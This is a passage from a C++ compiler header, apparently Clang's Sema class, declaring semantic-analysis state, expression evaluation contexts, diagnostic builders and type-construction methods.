~SynthesizedFunctionScope() {
if (PushedCodeSynthesisContext)
S.popCodeSynthesisContext();
if (auto *FD = dyn_cast<FunctionDecl>(S.CurContext))
FD->setWillHaveBody(false);
S.PopExpressionEvaluationContext();
S.PopFunctionScopeInfo();
}
};
/// WeakUndeclaredIdentifiers - Identifiers contained in
/// \#pragma weak before declared. rare. may alias another
/// identifier, declared or undeclared
llvm::MapVector<IdentifierInfo *, WeakInfo> WeakUndeclaredIdentifiers;
/// ExtnameUndeclaredIdentifiers - Identifiers contained in
/// \#pragma redefine_extname before declared. Used in Solaris system headers
/// to define functions that occur in multiple standards to call the version
/// in the currently selected standard.
llvm::DenseMap<IdentifierInfo*,AsmLabelAttr*> ExtnameUndeclaredIdentifiers;
/// Load weak undeclared identifiers from the external source.
void LoadExternalWeakUndeclaredIdentifiers();
/// WeakTopLevelDecl - Translation-unit scoped declarations generated by
/// \#pragma weak during processing of other Decls.
/// I couldn't figure out a clean way to generate these in-line, so
/// we store them here and handle separately -- which is a hack.
/// It would be best to refactor this.
SmallVector<Decl*,2> WeakTopLevelDecl;
IdentifierResolver IdResolver;
/// Translation Unit Scope - useful to Objective-C actions that need
/// to lookup file scope declarations in the "ordinary" C decl namespace.
/// For example, user-defined classes, built-in "id" type, etc.
Scope *TUScope;
/// The C++ "std" namespace, where the standard library resides.
LazyDeclPtr StdNamespace;
/// The C++ "std::bad_alloc" class, which is defined by the C++
/// standard library.
LazyDeclPtr StdBadAlloc;
/// The C++ "std::align_val_t" enum class, which is defined by the C++
/// standard library.
LazyDeclPtr StdAlignValT;
/// The C++ "std::experimental" namespace, where the experimental parts
/// of the standard library resides.
NamespaceDecl *StdExperimentalNamespaceCache;
/// The C++ "std::initializer_list" template, which is defined in
/// \<initializer_list>.
ClassTemplateDecl *StdInitializerList;
/// The C++ "std::coroutine_traits" template, which is defined in
/// \<coroutine_traits>
ClassTemplateDecl *StdCoroutineTraitsCache;
/// The C++ "type_info" declaration, which is defined in \<typeinfo>.
RecordDecl *CXXTypeInfoDecl;
/// The MSVC "_GUID" struct, which is defined in MSVC header files.
RecordDecl *MSVCGuidDecl;
/// Caches identifiers/selectors for NSFoundation APIs.
std::unique_ptr<NSAPI> NSAPIObj;
/// The declaration of the Objective-C NSNumber class.
ObjCInterfaceDecl *NSNumberDecl;
/// The declaration of the Objective-C NSValue class.
ObjCInterfaceDecl *NSValueDecl;
/// Pointer to NSNumber type (NSNumber *).
QualType NSNumberPointer;
/// Pointer to NSValue type (NSValue *).
QualType NSValuePointer;
/// The Objective-C NSNumber methods used to create NSNumber literals.
ObjCMethodDecl *NSNumberLiteralMethods[NSAPI::NumNSNumberLiteralMethods];
/// The declaration of the Objective-C NSString class.
ObjCInterfaceDecl *NSStringDecl;
/// Pointer to NSString type (NSString *).
QualType NSStringPointer;
/// The declaration of the stringWithUTF8String: method.
ObjCMethodDecl *StringWithUTF8StringMethod;
/// The declaration of the valueWithBytes:objCType: method.
ObjCMethodDecl *ValueWithBytesObjCTypeMethod;
/// The declaration of the Objective-C NSArray class.
ObjCInterfaceDecl *NSArrayDecl;
/// The declaration of the arrayWithObjects:count: method.
ObjCMethodDecl *ArrayWithObjectsMethod;
/// The declaration of the Objective-C NSDictionary class.
ObjCInterfaceDecl *NSDictionaryDecl;
/// The declaration of the dictionaryWithObjects:forKeys:count: method.
ObjCMethodDecl *DictionaryWithObjectsMethod;
/// id<NSCopying> type.
QualType QIDNSCopying;
/// will hold 'respondsToSelector:'
Selector RespondsToSelectorSel;
/// A flag to remember whether the implicit forms of operator new and delete
/// have been declared.
bool GlobalNewDeleteDeclared;
/// A flag to indicate that we're in a context that permits abstract
/// references to fields. This is really a
bool AllowAbstractFieldReference;
/// Describes how the expressions currently being parsed are
/// evaluated at run-time, if at all.
enum class ExpressionEvaluationContext {
/// The current expression and its subexpressions occur within an
/// unevaluated operand (C++11 [expr]p7), such as the subexpression of
/// \c sizeof, where the type of the expression may be significant but
/// no code will be generated to evaluate the value of the expression at
/// run time.
Unevaluated,
/// The current expression occurs within a braced-init-list within
/// an unevaluated operand. This is mostly like a regular unevaluated
/// context, except that we still instantiate constexpr functions that are
/// referenced here so that we can perform narrowing checks correctly.
UnevaluatedList,
/// The current expression occurs within a discarded statement.
/// This behaves largely similarly to an unevaluated operand in preventing
/// definitions from being required, but not in other ways.
DiscardedStatement,
/// The current expression occurs within an unevaluated
/// operand that unconditionally permits abstract references to
/// fields, such as a SIZE operator in MS-style inline assembly.
UnevaluatedAbstract,
/// The current context is "potentially evaluated" in C++11 terms,
/// but the expression is evaluated at compile-time (like the values of
/// cases in a switch statement).
ConstantEvaluated,
/// The current expression is potentially evaluated at run time,
/// which means that code may be generated to evaluate the value of the
/// expression at run time.
PotentiallyEvaluated,
/// The current expression is potentially evaluated, but any
/// declarations referenced inside that expression are only used if
/// in fact the current expression is used.
///
/// This value is used when parsing default function arguments, for which
/// we would like to provide diagnostics (e.g., passing non-POD arguments
/// through varargs) but do not want to mark declarations as "referenced"
/// until the default argument is used.
PotentiallyEvaluatedIfUsed
};
using ImmediateInvocationCandidate = llvm::PointerIntPair<ConstantExpr *, 1>;
/// Data structure used to record current or nested
/// expression evaluation contexts.
struct ExpressionEvaluationContextRecord {
/// The expression evaluation context.
ExpressionEvaluationContext Context;
/// Whether the enclosing context needed a cleanup.
CleanupInfo ParentCleanup;
/// Whether we are in a decltype expression.
bool IsDecltype;
/// The number of active cleanup objects when we entered
/// this expression evaluation context.
unsigned NumCleanupObjects;
/// The number of typos encountered during this expression evaluation
/// context (i.e. the number of TypoExprs created).
unsigned NumTypos;
MaybeODRUseExprSet SavedMaybeODRUseExprs;
/// The lambdas that are present within this context, if it
/// is indeed an unevaluated context.
SmallVector<LambdaExpr *, 2> Lambdas;
/// The declaration that provides context for lambda expressions
/// and block literals if the normal declaration context does not
/// suffice, e.g., in a default function argument.
Decl *ManglingContextDecl;
/// If we are processing a decltype type, a set of call expressions
/// for which we have deferred checking the completeness of the return type.
SmallVector<CallExpr *, 8> DelayedDecltypeCalls;
/// If we are processing a decltype type, a set of temporary binding
/// expressions for which we have deferred checking the destructor.
SmallVector<CXXBindTemporaryExpr *, 8> DelayedDecltypeBinds;
llvm::SmallPtrSet<const Expr *, 8> PossibleDerefs;
/// Expressions appearing as the LHS of a volatile assignment in this
/// context. We produce a warning for these when popping the context if
/// they are not discarded-value expressions nor unevaluated operands.
SmallVector<Expr*, 2> VolatileAssignmentLHSs;
/// Set of candidates for starting an immediate invocation.
llvm::SmallVector<ImmediateInvocationCandidate, 4> ImmediateInvocationCandidates;
/// Set of DeclRefExprs referencing a consteval function when used in a
/// context not already known to be immediately invoked.
llvm::SmallPtrSet<DeclRefExpr *, 4> ReferenceToConsteval;
/// \brief Describes whether we are in an expression constext which we have
/// to handle differently.
enum ExpressionKind {
EK_Decltype, EK_TemplateArgument, EK_Other
} ExprContext;
ExpressionEvaluationContextRecord(ExpressionEvaluationContext Context,
unsigned NumCleanupObjects,
CleanupInfo ParentCleanup,
Decl *ManglingContextDecl,
ExpressionKind ExprContext)
: Context(Context), ParentCleanup(ParentCleanup),
NumCleanupObjects(NumCleanupObjects), NumTypos(0),
ManglingContextDecl(ManglingContextDecl), ExprContext(ExprContext) {}
bool isUnevaluated() const {
return Context == ExpressionEvaluationContext::Unevaluated ||
Context == ExpressionEvaluationContext::UnevaluatedAbstract ||
Context == ExpressionEvaluationContext::UnevaluatedList;
}
bool isConstantEvaluated() const {
return Context == ExpressionEvaluationContext::ConstantEvaluated;
}
};
/// A stack of expression evaluation contexts.
SmallVector<ExpressionEvaluationContextRecord, 8> ExprEvalContexts;
/// Emit a warning for all pending noderef expressions that we recorded.
void WarnOnPendingNoDerefs(ExpressionEvaluationContextRecord &Rec);
/// Compute the mangling number context for a lambda expression or
/// block literal. Also return the extra mangling decl if any.
///
/// \param DC - The DeclContext containing the lambda expression or
/// block literal.
std::tuple<MangleNumberingContext *, Decl *>
getCurrentMangleNumberContext(const DeclContext *DC);
/// SpecialMemberOverloadResult - The overloading result for a special member
/// function.
///
/// This is basically a wrapper around PointerIntPair. The lowest bits of the
/// integer are used to determine whether overload resolution succeeded.
class SpecialMemberOverloadResult {
public:
enum Kind {
NoMemberOrDeleted,
Ambiguous,
Success
};
private:
llvm::PointerIntPair<CXXMethodDecl*, 2> Pair;
public:
SpecialMemberOverloadResult() : Pair() {}
SpecialMemberOverloadResult(CXXMethodDecl *MD)
: Pair(MD, MD->isDeleted() ? NoMemberOrDeleted : Success) {}
CXXMethodDecl *getMethod() const { return Pair.getPointer(); }
void setMethod(CXXMethodDecl *MD) { Pair.setPointer(MD); }
Kind getKind() const { return static_cast<Kind>(Pair.getInt()); }
void setKind(Kind K) { Pair.setInt(K); }
};
class SpecialMemberOverloadResultEntry
: public llvm::FastFoldingSetNode,
public SpecialMemberOverloadResult {
public:
SpecialMemberOverloadResultEntry(const llvm::FoldingSetNodeID &ID)
: FastFoldingSetNode(ID)
{}
};
/// A cache of special member function overload resolution results
/// for C++ records.
llvm::FoldingSet<SpecialMemberOverloadResultEntry> SpecialMemberCache;
/// A cache of the flags available in enumerations with the flag_bits
/// attribute.
mutable llvm::DenseMap<const EnumDecl*, llvm::APInt> FlagBitsCache;
/// The kind of translation unit we are processing.
///
/// When we're processing a complete translation unit, Sema will perform
/// end-of-translation-unit semantic tasks (such as creating
/// initializers for tentative definitions in C) once parsing has
/// completed. Modules and precompiled headers perform different kinds of
/// checks.
TranslationUnitKind TUKind;
llvm::BumpPtrAllocator BumpAlloc;
/// The number of SFINAE diagnostics that have been trapped.
unsigned NumSFINAEErrors;
typedef llvm::DenseMap<ParmVarDecl *, llvm::TinyPtrVector<ParmVarDecl *>>
UnparsedDefaultArgInstantiationsMap;
/// A mapping from parameters with unparsed default arguments to the
/// set of instantiations of each parameter.
///
/// This mapping is a temporary data structure used when parsing
/// nested class templates or nested classes of class templates,
/// where we might end up instantiating an inner class before the
/// default arguments of its methods have been parsed.
UnparsedDefaultArgInstantiationsMap UnparsedDefaultArgInstantiations;
// Contains the locations of the beginning of unparsed default
// argument locations.
llvm::DenseMap<ParmVarDecl *, SourceLocation> UnparsedDefaultArgLocs;
/// UndefinedInternals - all the used, undefined objects which require a
/// definition in this translation unit.
llvm::MapVector<NamedDecl *, SourceLocation> UndefinedButUsed;
/// Determine if VD, which must be a variable or function, is an external
/// symbol that nonetheless can't be referenced from outside this translation
/// unit because its type has no linkage and it's not extern "C".
bool isExternalWithNoLinkageType(ValueDecl *VD);
/// Obtain a sorted list of functions that are undefined but ODR-used.
void getUndefinedButUsed(
SmallVectorImpl<std::pair<NamedDecl *, SourceLocation> > &Undefined);
/// Retrieves list of suspicious delete-expressions that will be checked at
/// the end of translation unit.
const llvm::MapVector<FieldDecl *, DeleteLocs> &
getMismatchingDeleteExpressions() const;
typedef std::pair<ObjCMethodList, ObjCMethodList> GlobalMethods;
typedef llvm::DenseMap<Selector, GlobalMethods> GlobalMethodPool;
/// Method Pool - allows efficient lookup when typechecking messages to "id".
/// We need to maintain a list, since selectors can have differing signatures
/// across classes. In Cocoa, this happens to be extremely uncommon (only 1%
/// of selectors are "overloaded").
/// At the head of the list it is recorded whether there were 0, 1, or >= 2
/// methods inside categories with a particular selector.
GlobalMethodPool MethodPool;
/// Method selectors used in a \@selector expression. Used for implementation
/// of -Wselector.
llvm::MapVector<Selector, SourceLocation> ReferencedSelectors;
/// List of SourceLocations where 'self' is implicitly retained inside a
/// block.
llvm::SmallVector<std::pair<SourceLocation, const BlockDecl *>, 1>
ImplicitlyRetainedSelfLocs;
/// Kinds of C++ special members.
enum CXXSpecialMember {
CXXDefaultConstructor,
CXXCopyConstructor,
CXXMoveConstructor,
CXXCopyAssignment,
CXXMoveAssignment,
CXXDestructor,
CXXInvalid
};
typedef llvm::PointerIntPair<CXXRecordDecl *, 3, CXXSpecialMember>
SpecialMemberDecl;
/// The C++ special members which we are currently in the process of
/// declaring. If this process recursively triggers the declaration of the
/// same special member, we should act as if it is not yet declared.
llvm::SmallPtrSet<SpecialMemberDecl, 4> SpecialMembersBeingDeclared;
/// Kinds of defaulted comparison operator functions.
enum class DefaultedComparisonKind : unsigned char {
/// This is not a defaultable comparison operator.
None,
/// This is an operator== that should be implemented as a series of
/// subobject comparisons.
Equal,
/// This is an operator<=> that should be implemented as a series of
/// subobject comparisons.
ThreeWay,
/// This is an operator!= that should be implemented as a rewrite in terms
/// of a == comparison.
NotEqual,
/// This is an <, <=, >, or >= that should be implemented as a rewrite in
/// terms of a <=> comparison.
Relational,
};
/// The function definitions which were renamed as part of typo-correction
/// to match their respective declarations. We want to keep track of them
/// to ensure that we don't emit a "redefinition" error if we encounter a
/// correctly named definition after the renamed definition.
llvm::SmallPtrSet<const NamedDecl *, 4> TypoCorrectedFunctionDefinitions;
/// Stack of types that correspond to the parameter entities that are
/// currently being copy-initialized. Can be empty.
llvm::SmallVector<QualType, 4> CurrentParameterCopyTypes;
void ReadMethodPool(Selector Sel);
void updateOutOfDateSelector(Selector Sel);
/// Private Helper predicate to check for 'self'.
bool isSelfExpr(Expr *RExpr);
bool isSelfExpr(Expr *RExpr, const ObjCMethodDecl *Method);
/// Cause the active diagnostic on the DiagosticsEngine to be
/// emitted. This is closely coupled to the SemaDiagnosticBuilder class and
/// should not be used elsewhere.
void EmitCurrentDiagnostic(unsigned DiagID);
/// Records and restores the CurFPFeatures state on entry/exit of compound
/// statements.
class FPFeaturesStateRAII {
public:
FPFeaturesStateRAII(Sema &S) : S(S), OldFPFeaturesState(S.CurFPFeatures) {}
~FPFeaturesStateRAII() { S.CurFPFeatures = OldFPFeaturesState; }
private:
Sema& S;
FPOptions OldFPFeaturesState;
};
void addImplicitTypedef(StringRef Name, QualType T);
bool WarnedStackExhausted = false;
public:
Sema(Preprocessor &pp, ASTContext &ctxt, ASTConsumer &consumer,
TranslationUnitKind TUKind = TU_Complete,
CodeCompleteConsumer *CompletionConsumer = nullptr);
~Sema();
/// Perform initialization that occurs after the parser has been
/// initialized but before it parses anything.
void Initialize();
const LangOptions &getLangOpts() const { return LangOpts; }
OpenCLOptions &getOpenCLOptions() { return OpenCLFeatures; }
FPOptions &getCurFPFeatures() { return CurFPFeatures; }
DiagnosticsEngine &getDiagnostics() const { return Diags; }
SourceManager &getSourceManager() const { return SourceMgr; }
Preprocessor &getPreprocessor() const { return PP; }
ASTContext &getASTContext() const { return Context; }
ASTConsumer &getASTConsumer() const { return Consumer; }
ASTMutationListener *getASTMutationListener() const;
ExternalSemaSource* getExternalSource() const { return ExternalSource; }
///Registers an external source. If an external source already exists,
/// creates a multiplex external source and appends to it.
///
///\param[in] E - A non-null external sema source.
///
void addExternalSource(ExternalSemaSource *E);
void PrintStats() const;
/// Warn that the stack is nearly exhausted.
void warnStackExhausted(SourceLocation Loc);
/// Run some code with "sufficient" stack space. (Currently, at least 256K is
/// guaranteed). Produces a warning if we're low on stack space and allocates
/// more in that case. Use this in code that may recurse deeply (for example,
/// in template instantiation) to avoid stack overflow.
void runWithSufficientStackSpace(SourceLocation Loc,
llvm::function_ref<void()> Fn);
/// Helper class that creates diagnostics with optional
/// template instantiation stacks.
///
/// This class provides a wrapper around the basic DiagnosticBuilder
/// class that emits diagnostics. SemaDiagnosticBuilder is
/// responsible for emitting the diagnostic (as DiagnosticBuilder
/// does) and, if the diagnostic comes from inside a template
/// instantiation, printing the template instantiation stack as
/// well.
class SemaDiagnosticBuilder : public DiagnosticBuilder {
Sema &SemaRef;
unsigned DiagID;
public:
SemaDiagnosticBuilder(DiagnosticBuilder &DB, Sema &SemaRef, unsigned DiagID)
: DiagnosticBuilder(DB), SemaRef(SemaRef), DiagID(DiagID) { }
// This is a cunning lie. DiagnosticBuilder actually performs move
// construction in its copy constructor (but due to varied uses, it's not
// possible to conveniently express this as actual move construction). So
// the default copy ctor here is fine, because the base class disables the
// source anyway, so the user-defined ~SemaDiagnosticBuilder is a safe no-op
// in that case anwyay.
SemaDiagnosticBuilder(const SemaDiagnosticBuilder&) = default;
~SemaDiagnosticBuilder() {
// If we aren't active, there is nothing to do.
if (!isActive()) return;
// Otherwise, we need to emit the diagnostic. First flush the underlying
// DiagnosticBuilder data, and clear the diagnostic builder itself so it
// won't emit the diagnostic in its own destructor.
//
// This seems wasteful, in that as written the DiagnosticBuilder dtor will
// do its own needless checks to see if the diagnostic needs to be
// emitted. However, because we take care to ensure that the builder
// objects never escape, a sufficiently smart compiler will be able to
// eliminate that code.
FlushCounts();
Clear();
// Dispatch to Sema to emit the diagnostic.
SemaRef.EmitCurrentDiagnostic(DiagID);
}
/// Teach operator<< to produce an object of the correct type.
template<typename T>
friend const SemaDiagnosticBuilder &operator<<(
const SemaDiagnosticBuilder &Diag, const T &Value) {
const DiagnosticBuilder &BaseDiag = Diag;
BaseDiag << Value;
return Diag;
}
};
/// Emit a diagnostic.
SemaDiagnosticBuilder Diag(SourceLocation Loc, unsigned DiagID) {
DiagnosticBuilder DB = Diags.Report(Loc, DiagID);
return SemaDiagnosticBuilder(DB, *this, DiagID);
}
/// Emit a partial diagnostic.
SemaDiagnosticBuilder Diag(SourceLocation Loc, const PartialDiagnostic& PD);
/// Build a partial diagnostic.
PartialDiagnostic PDiag(unsigned DiagID = 0); // in SemaInternal.h
bool findMacroSpelling(SourceLocation &loc, StringRef name);
/// Get a string to suggest for zero-initialization of a type.
std::string
getFixItZeroInitializerForType(QualType T, SourceLocation Loc) const;
std::string getFixItZeroLiteralForType(QualType T, SourceLocation Loc) const;
/// Calls \c Lexer::getLocForEndOfToken()
SourceLocation getLocForEndOfToken(SourceLocation Loc, unsigned Offset = 0);
/// Retrieve the module loader associated with the preprocessor.
ModuleLoader &getModuleLoader() const;
/// Invent a new identifier for parameters of abbreviated templates.
IdentifierInfo *
InventAbbreviatedTemplateParameterTypeName(IdentifierInfo *ParamName,
unsigned Index);
void emitAndClearUnusedLocalTypedefWarnings();
private:
/// Function or variable declarations to be checked for whether the deferred
/// diagnostics should be emitted.
SmallVector<Decl *, 4> DeclsToCheckForDeferredDiags;
public:
// Emit all deferred diagnostics.
void emitDeferredDiags();
enum TUFragmentKind {
/// The global module fragment, between 'module;' and a module-declaration.
Global,
/// A normal translation unit fragment. For a non-module unit, this is the
/// entire translation unit. Otherwise, it runs from the module-declaration
/// to the private-module-fragment (if any) or the end of the TU (if not).
Normal,
/// The private module fragment, between 'module :private;' and the end of
/// the translation unit.
Private
};
void ActOnStartOfTranslationUnit();
void ActOnEndOfTranslationUnit();
void ActOnEndOfTranslationUnitFragment(TUFragmentKind Kind);
void CheckDelegatingCtorCycles();
Scope *getScopeForContext(DeclContext *Ctx);
void PushFunctionScope();
void PushBlockScope(Scope *BlockScope, BlockDecl *Block);
sema::LambdaScopeInfo *PushLambdaScope();
/// This is used to inform Sema what the current TemplateParameterDepth
/// is during Parsing. Currently it is used to pass on the depth
/// when parsing generic lambda 'auto' parameters.
void RecordParsingTemplateParameterDepth(unsigned Depth);
void PushCapturedRegionScope(Scope *RegionScope, CapturedDecl *CD,
RecordDecl *RD, CapturedRegionKind K,
unsigned OpenMPCaptureLevel = 0);
/// Custom deleter to allow FunctionScopeInfos to be kept alive for a short
/// time after they've been popped.
class PoppedFunctionScopeDeleter {
Sema *Self;
public:
explicit PoppedFunctionScopeDeleter(Sema *Self) : Self(Self) {}
void operator()(sema::FunctionScopeInfo *Scope) const;
};
using PoppedFunctionScopePtr =
std::unique_ptr<sema::FunctionScopeInfo, PoppedFunctionScopeDeleter>;
PoppedFunctionScopePtr
PopFunctionScopeInfo(const sema::AnalysisBasedWarnings::Policy *WP = nullptr,
const Decl *D = nullptr,
QualType BlockType = QualType());
sema::FunctionScopeInfo *getCurFunction() const {
return FunctionScopes.empty() ? nullptr : FunctionScopes.back();
}
sema::FunctionScopeInfo *getEnclosingFunction() const;
void setFunctionHasBranchIntoScope();
void setFunctionHasBranchProtectedScope();
void setFunctionHasIndirectGoto();
void PushCompoundScope(bool IsStmtExpr);
void PopCompoundScope();
sema::CompoundScopeInfo &getCurCompoundScope() const;
bool hasAnyUnrecoverableErrorsInThisFunction() const;
/// Retrieve the current block, if any.
sema::BlockScopeInfo *getCurBlock();
/// Get the innermost lambda enclosing the current location, if any. This
/// looks through intervening non-lambda scopes such as local functions and
/// blocks.
sema::LambdaScopeInfo *getEnclosingLambda() const;
/// Retrieve the current lambda scope info, if any.
/// \param IgnoreNonLambdaCapturingScope true if should find the top-most
/// lambda scope info ignoring all inner capturing scopes that are not
/// lambda scopes.
sema::LambdaScopeInfo *
getCurLambda(bool IgnoreNonLambdaCapturingScope = false);
/// Retrieve the current generic lambda info, if any.
sema::LambdaScopeInfo *getCurGenericLambda();
/// Retrieve the current captured region, if any.
sema::CapturedRegionScopeInfo *getCurCapturedRegion();
/// WeakTopLevelDeclDecls - access to \#pragma weak-generated Decls
SmallVectorImpl<Decl *> &WeakTopLevelDecls() { return WeakTopLevelDecl; }
/// Called before parsing a function declarator belonging to a function
/// declaration.
void ActOnStartFunctionDeclarationDeclarator(Declarator &D,
unsigned TemplateParameterDepth);
/// Called after parsing a function declarator belonging to a function
/// declaration.
void ActOnFinishFunctionDeclarationDeclarator(Declarator &D);
void ActOnComment(SourceRange Comment);
//===--------------------------------------------------------------------===//
// Type Analysis / Processing: SemaType.cpp.
//
QualType BuildQualifiedType(QualType T, SourceLocation Loc, Qualifiers Qs,
const DeclSpec *DS = nullptr);
QualType BuildQualifiedType(QualType T, SourceLocation Loc, unsigned CVRA,
const DeclSpec *DS = nullptr);
QualType BuildPointerType(QualType T,
SourceLocation Loc, DeclarationName Entity);
QualType BuildReferenceType(QualType T, bool LValueRef,
SourceLocation Loc, DeclarationName Entity);
QualType BuildArrayType(QualType T, ArrayType::ArraySizeModifier ASM,
Expr *ArraySize, unsigned Quals,
SourceRange Brackets, DeclarationName Entity);
QualType BuildVectorType(QualType T, Expr *VecSize, SourceLocation AttrLoc);
QualType BuildExtVectorType(QualType T, Expr *ArraySize,
SourceLocation AttrLoc);
QualType BuildMatrixType(QualType T, Expr *NumRows, Expr *NumColumns,
SourceLocation AttrLoc);
QualType BuildAddressSpaceAttr(QualType &T, LangAS ASIdx, Expr *AddrSpace,
SourceLocation AttrLoc);
/// Same as above, but constructs the AddressSpace index if not provided.
QualType BuildAddressSpaceAttr(QualType &T, Expr *AddrSpace,
SourceLocation AttrLoc);
bool CheckQualifiedFunctionForTypeId(QualType T, SourceLocation Loc);
bool CheckFunctionReturnType(QualType T, SourceLocation Loc);
/// Build a function type.
///
/// This routine checks the function type according to C++ rules and
/// under the assumption that the result type and parameter types have
/// just been instantiated from a template. It therefore duplicates
/// some of the behavior of GetTypeForDeclarator, but in a much
/// simpler form that is only suitable for this narrow use case.
///
/// \param T The return type of the function.
///
/// \param ParamTypes The parameter types of the function. This array
/// will be modified to account for adjustments to the types of the
/// function parameters.
///
/// \param Loc The location of the entity whose type involves this
/// function type or, if there is no such entity, the location of the
/// type that will have function type.
///
/// \param Entity The name of the entity that involves the function
/// type, if known.
///
/// \param EPI Extra information about the function type. Usually this will
/// be taken from an existing function with the same prototype.
///
/// \returns A suitable function type, if there are no errors. The
/// unqualified type will always be a FunctionProtoType.
/// Otherwise, returns a NULL type.
QualType BuildFunctionType(QualType T,
MutableArrayRef<QualType> ParamTypes,
SourceLocation Loc, DeclarationName Entity,
const FunctionProtoType::ExtProtoInfo &EPI);
QualType BuildMemberPointerType(QualType T, QualType Class,
SourceLocation Loc,
DeclarationName Entity);
QualType BuildBlockPointerType(QualType T,
SourceLocation Loc, DeclarationName Entity);
QualType BuildParenType(QualType T);
QualType BuildAtomicType(QualType T, SourceLocation Loc);
QualType BuildReadPipeType(QualType T,
SourceLocation Loc);
QualType BuildWritePipeType(QualType T,
SourceLocation Loc);
QualType BuildExtIntType(bool IsUnsigned, Expr *BitWidth, SourceLocation Loc);
TypeSourceInfo *GetTypeForDeclarator(Declarator &D, Scope *S);
TypeSourceInfo *GetTypeForDeclaratorCast(Declarator &D, QualType FromTy);
/// Package the given type and TSI into a ParsedType.
ParsedType CreateParsedType(QualType T, TypeSourceInfo *TInfo);
DeclarationNameInfo GetNameForDeclarator(Declarator &D);
DeclarationNameInfo GetNameFromUnqualifiedId(const UnqualifiedId &Name);
static QualType GetTypeFromParser(ParsedType Ty,
TypeSourceInfo **TInfo = nullptr);
CanThrowResult canThrow(const Stmt *E);
const FunctionProtoType *ResolveExceptionSpec(SourceLocation Loc,
const FunctionProtoType *FPT);
void UpdateExceptionSpec(FunctionDecl *FD,
const FunctionProtoType::ExceptionSpecInfo &ESI);
bool CheckSpecifiedExceptionType(QualType &T, SourceRange Range);
bool CheckDistantExceptionSpec(QualType T);
bool CheckEquivalentExceptionSpec(FunctionDecl *Old, FunctionDecl *New);
bool CheckEquivalentExceptionSpec(
const FunctionProtoType *Old, SourceLocation OldLoc,
const FunctionProtoType *New, SourceLocation NewLoc);
bool CheckEquivalentExceptionSpec(
const PartialDiagnostic &DiagID, const PartialDiagnostic & NoteID,
const FunctionProtoType *Old, SourceLocation OldLoc,
const FunctionProtoType *New, SourceLocation NewLoc);
bool handlerCanCatch(QualType HandlerType, QualType ExceptionType);
bool CheckExceptionSpecSubset(const PartialDiagnostic &DiagID,
const PartialDiagnostic &NestedDiagID,
const PartialDiagnostic &NoteID,
const PartialDiagnostic &NoThrowDiagID,
const FunctionProtoType *Superset,
SourceLocation SuperLoc,
const FunctionProtoType *Subset,
SourceLocation SubLoc);
bool CheckParamExceptionSpec(const PartialDiagnostic &NestedDiagID,
const PartialDiagnostic &NoteID,
const FunctionProtoType *Target,
SourceLocation TargetLoc,
const FunctionProtoType *Source,
SourceLocation SourceLoc);
TypeResult ActOnTypeName(Scope *S, Declarator &D);
/// The parser has parsed the context-sensitive type 'instancetype'
/// in an Objective-C message declaration. Return the appropriate type.
ParsedType ActOnObjCInstanceType(SourceLocation Loc);
/// Abstract class used to diagnose incomplete types.
struct TypeDiagnoser {
TypeDiagnoser() {}
virtual void diagnose(Sema &S, SourceLocation Loc, QualType T) = 0;
virtual ~TypeDiagnoser() {}
};
static int getPrintable(int I) { return I; }
static unsigned getPrintable(unsigned I) { return I; }
static bool getPrintable(bool B) { return B; }
static const char * getPrintable(const char *S) { return S; }
static StringRef getPrintable(StringRef S) { return S; }
static const std::string &getPrintable(const std::string &S) { return S; }
static const IdentifierInfo *getPrintable(const IdentifierInfo *II) {
return II;
}
static DeclarationName getPrintable(DeclarationName N) { return N; }
static QualType getPrintable(QualType T) { return T; }
static SourceRange getPrintable(SourceRange R) { return R; }
static SourceRange getPrintable(SourceLocation L) { return L; }
static SourceRange getPrintable(const Expr *E) { return E->getSourceRange(); }
static SourceRange getPrintable(TypeLoc TL) { return TL.getSourceRange();}
template <typename... Ts> class BoundTypeDiagnoser : public TypeDiagnoser {
protected:
unsigned DiagID;
std::tuple<const Ts &...> Args;
template <std::size_t... Is>
void emit(const SemaDiagnosticBuilder &DB,
std::index_sequence<Is...>) const {
// Apply all tuple elements to the builder in order.
bool Dummy[] = {false, (DB << getPrintable(std::get<Is>(Args)))...};
(void)Dummy;
}
public:
BoundTypeDiagnoser(unsigned DiagID, const Ts &...Args)
: TypeDiagnoser(), DiagID(DiagID), Args(Args...) {
assert(DiagID != 0 && "no diagnostic for type diagnoser");
}
void diagnose(Sema &S, SourceLocation Loc, QualType T) override {
const SemaDiagnosticBuilder &DB = S.Diag(Loc, DiagID);
emit(DB, std::index_sequence_for<Ts...>());
DB << T;
}
};
/// Do a check to make sure \p Name looks like a legal swift_name
/// attribute for the decl \p D. Raise a diagnostic if the name is invalid
/// for the given declaration.
///
/// For a function, this will validate a compound Swift name,
/// e.g. <code>init(foo:bar:baz:)</code> or <code>controllerForName(_:)</code>,
/// and the function will output the number of parameter names, and whether
/// this is a single-arg initializer.
///
/// For a type, enum constant, property, or variable declaration, this will
/// validate either a simple identifier, or a qualified
/// <code>context.identifier</code> name.
///
/// \returns true if the name is a valid swift name for \p D, false otherwise.
bool DiagnoseSwiftName(Decl *D, StringRef Name,
SourceLocation ArgLoc,
const IdentifierInfo *AttrName);
/// A derivative of BoundTypeDiagnoser for which the diagnostic's type
/// parameter is preceded by a 0/1 enum that is 1 if the type is sizeless.
/// For example, a diagnostic with no other parameters would generally have
/// the form "...%select{incomplete|sizeless}0 type %1...".
template <typename... Ts>
class SizelessTypeDiagnoser : public BoundTypeDiagnoser<Ts...> {
public:
SizelessTypeDiagnoser(unsigned DiagID, const Ts &... Args)
: BoundTypeDiagnoser<Ts...>(DiagID, Args...) {}
void diagnose(Sema &S, SourceLocation Loc, QualType T) override {
const SemaDiagnosticBuilder &DB = S.Diag(Loc, this->DiagID);
this->emit(DB, std::index_sequence_for<Ts...>());
DB << T->isSizelessType() << T;
}
};
enum class CompleteTypeKind {
/// Apply the normal rules for complete types. In particular,
/// treat all sizeless types as incomplete.
Normal,
/// Relax the normal rules for complete types so that they include
/// sizeless built-in types.
AcceptSizeless,
// FIXME: Eventually we should flip the default to Normal and opt in
// to AcceptSizeless rather than opt out of it.
Default = AcceptSizeless
};
private:
/// Methods for marking which expressions involve dereferencing a pointer
/// marked with the 'noderef' attribute. Expressions are checked bottom up as
/// they are parsed, meaning that a noderef pointer may not be accessed. For
/// example, in `&*p` where `p` is a noderef pointer, we will first parse the
/// `*p`, but need to check that `address of` is called on it. This requires
/// keeping a container of all pending expressions and checking if the address
/// of them are eventually taken.
void CheckSubscriptAccessOfNoDeref(const ArraySubscriptExpr *E);
void CheckAddressOfNoDeref(const Expr *E);
void CheckMemberAccessOfNoDeref(const MemberExpr *E);
bool RequireCompleteTypeImpl(SourceLocation Loc, QualType T,
